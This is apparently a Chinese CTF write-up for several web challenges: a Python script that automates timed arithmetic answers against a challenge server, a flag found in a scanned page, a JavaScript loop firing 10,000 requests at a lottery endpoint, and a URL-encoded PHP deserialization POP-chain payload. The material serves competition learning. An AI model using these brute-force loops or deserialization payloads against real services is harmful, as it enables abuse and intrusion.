小猿口算签到重生版
1.5秒要给出口算答案的前端题,
找到关键前端代码
$(function(){
function g(){
$.ajax({
url:'/generate',
method:'GET',
success:function(r){
var e=r.expression
$("#code").text(e)
if($("#code").hasClass("nocode")){
$("#code").removeClass("nocode")
$("#code").addClass("code")
}
}
})
}
setInterval(g,1500)
$("#check").click(function(){
var u=$(".input").val()
$.ajax({
url:'/verify',
method:'POST',
contentType:'application/json',
data:JSON.stringify({user_input:u}),
success:function(r){
if(r.flag){alert("恭喜你,答案正确!Flag: "+r.flag)}
},
error:function(x){
if(x.responseJSON&&x.responseJSON.error){alert(x.responseJSON.error)}
else{alert("验证失败,请重试!")}
}
})
})
})
让ai去自动计算并返回flag
import requests
import time
import re
import json
import math
from urllib.parse import urljoin
class MathExpressionSolver:
def __init__(self, base_url="http://27.25.151.40:33233/"):
self.base_url = base_url
self.session = requests.Session()
self.expression = ""
self.attempts = 0
self.success = False
self.flag = ""
self.start_time = time.time()
# 设置请求头
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
"Connection": "keep-alive",
"Content-Type": "application/json",
"X-Requested-With": "XMLHttpRequest"
}
def print_banner(self):
"""打印程序横幅"""banner = r"""
_______ _____ _ _ _ _ _ _ _
|__ __| / ____|| | | | | | | (_) | | (_)
| | ___ ___ | | | |__ __ _| |_| |__| |_ _ __ ___| |_ _ ___ _ __
| | / __|/ _ \| | | '_ \ / _` | __| __ | | '_ \/ __| __| |/ _ \| '_ \
| | \__ \ (_) | |____ | | | | (_| | |_| | | | | | | \__ \ |_| | (_) | | | |
|_| |___/\___/ \_____||_| |_|\__,_|\__|_| |_|_|_| |_|___/\__|_|\___/|_| |_|
"""
print(banner)
print(f"{'*' * 60}")
print(f"* 目标服务器: {self.base_url}")
print(f"* 开始时间: {time.strftime('%Y-%m-%d %H:%M:%S')}")
print(f"{'*' * 60}")
def get_expression(self):
"""从服务器获取数学表达式"""try:
url = urljoin(self.base_url, "/generate")
response = self.session.get(url, headers=self.headers, timeout=5)
if response.status_code == 200:
data = response.json()
self.expression = data.get("expression", "").strip()
return True
else:
print(f"[!] 获取表达式失败,状态码: {response.status_code}")
return False
except Exception as e:
print(f"[!] 获取表达式时发生错误: {str(e)}")
return False
def safe_evaluate(self, expr):
"""安全计算数学表达式"""try:
# 清理表达式,移除潜在危险字符
sanitized_expr = re.sub(r'[^0-9+\-*/(). ]', '', expr)
# 处理特殊数学函数(如sqrt)
if "sqrt" in sanitized_expr:
num = float(re.search(r'sqrt\((\d+)\)', sanitized_expr).group(1))
return round(math.sqrt(num), 4)
# 替换除数为0的情况以避免错误
sanitized_expr = re.sub(r'(\d+)\s*/\s*0(?!\.)', r'\1 / 1', sanitized_expr)
# 使用eval计算表达式
result = eval(sanitized_expr, {"__builtins__": None}, {})
# 处理浮点数精度
if isinstance(result, float):
# 如果结果是整数,则返回整数形式
if result.is_integer():
return int(result)
# 否则保留4位小数
return round(result, 4)
return result
except ZeroDivisionError:
print(f"[!] 错误: 除数为零 - {expr}")
return None
except Exception as e:
print(f"[!] 计算表达式时发生错误: {str(e)} - {expr}")
return None
def submit_solution(self, solution):
"""提交解决方案到服务器"""try:
url = urljoin(self.base_url, "/verify")
payload = json.dumps({"user_input": str(solution)})
response = self.session.post(
url,
data=payload,
headers=self.headers,
timeout=5
)
self.attempts += 1
if response.status_code == 200:
data = response.json()
if data.get("flag"):
self.flag = data["flag"]
self.success = True
return True
else:
print(f"[!] 答案错误,服务器响应: {data}")
return False
else:
error_msg = f"[!] 验证失败,状态码: {response.status_code}"
try:
error_data = response.json()
error_msg += f", 错误信息: {error_data.get('error', '未知错误')}"
except:
pass
print(error_msg)
return False
except Exception as e:
print(f"[!] 提交解决方案时发生错误: {str(e)}")
return False
def run(self):
"""主循环,持续获取表达式并提交答案"""self.print_banner()
print("[*] 正在启动自动化解题流程...")
print(f"[*] 每1.5秒尝试一次解题")
print("-" * 60)
while not self.success and self.attempts < 100: # 最多尝试100次
# 获取表达式
if not self.get_expression():
time.sleep(1.5)
continue
print(f"[+] 获取到表达式: {self.expression}")
# 计算表达式
solution = self.safe_evaluate(self.expression)
if solution is None:
print(f"[!] 无法计算表达式: {self.expression}")
time.sleep(1.5)
continue
print(f"[+] 计算结果: {solution}")
# 提交答案
print(f"[*] 正在提交答案: {solution}")
if self.submit_solution(solution):
elapsed = time.time() - self.start_time
print("=" * 60)
print(f"[+] 解题成功! 共尝试 {self.attempts} 次")
print(f"[+] 耗时: {elapsed:.2f} 秒")
print(f"[+] 获取到Flag: {self.flag}")
print("=" * 60)
return True
else:
print(f"[*] 尝试失败,等待重试...")
time.sleep(1.5)
if not self.success:
elapsed = time.time() - self.start_time
print("=" * 60)
print(f"[!] 解题失败,共尝试 {self.attempts} 次")
print(f"[!] 耗时: {elapsed:.2f} 秒")
print("=" * 60)
return False
if __name__ == "__main__":
# 创建解题器实例
solver = MathExpressionSolver()
# 运行解题流程
solver.run()
busy_search
一开始显示404,根据题目,扫出/index.html
是一大堆文本
翻文本看到散落的flag
CM{yong_chu_xuelian}lottery签到重生版
async function tryMultipleSpins(times) {
// 使用更清晰的循环计数器命名
for (let attempt = 1; attempt <= times; attempt++) {
try {
// 保持原有请求逻辑不变
const response = await fetch('/spin', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
}
});
const result = await response.json();
// 检查是否找到flag
if (result.flagContent) {
console.log(`Flag found on attempt ${attempt}:`, result.flagContent);
return; // 找到后立即退出
}
} catch (error) {
// 添加简单的错误处理但不中断流程
console.error(`Error on attempt ${attempt}:`, error.message);
}
}
// 所有尝试完成后输出结果
console.log(`No flag found after ${times} attempts`);
}
// 执行10000次尝试(保持原有调用方式)
tryMultipleSpins(10000);
pop之我又双叒叕重生了
?wlaq=O%3A2%3A%22A1%22%3A1%3A%7Bs%3A2%3A%22a1%22%3BO%3A2%3A%22A2%22%3A1%3A%7Bs%3A2%3A%22a2%22%3BO%3A2%3A%22A3%22%3A1%3A%7Bs%3A2%3A%22a3%22%3BO%3A2%3A%22A4%22%3A1%3A%7Bs%3A2%3A%22a4%22%3BN%3B%7D%7D%7D%7D&2025=admin
Comments NOTHING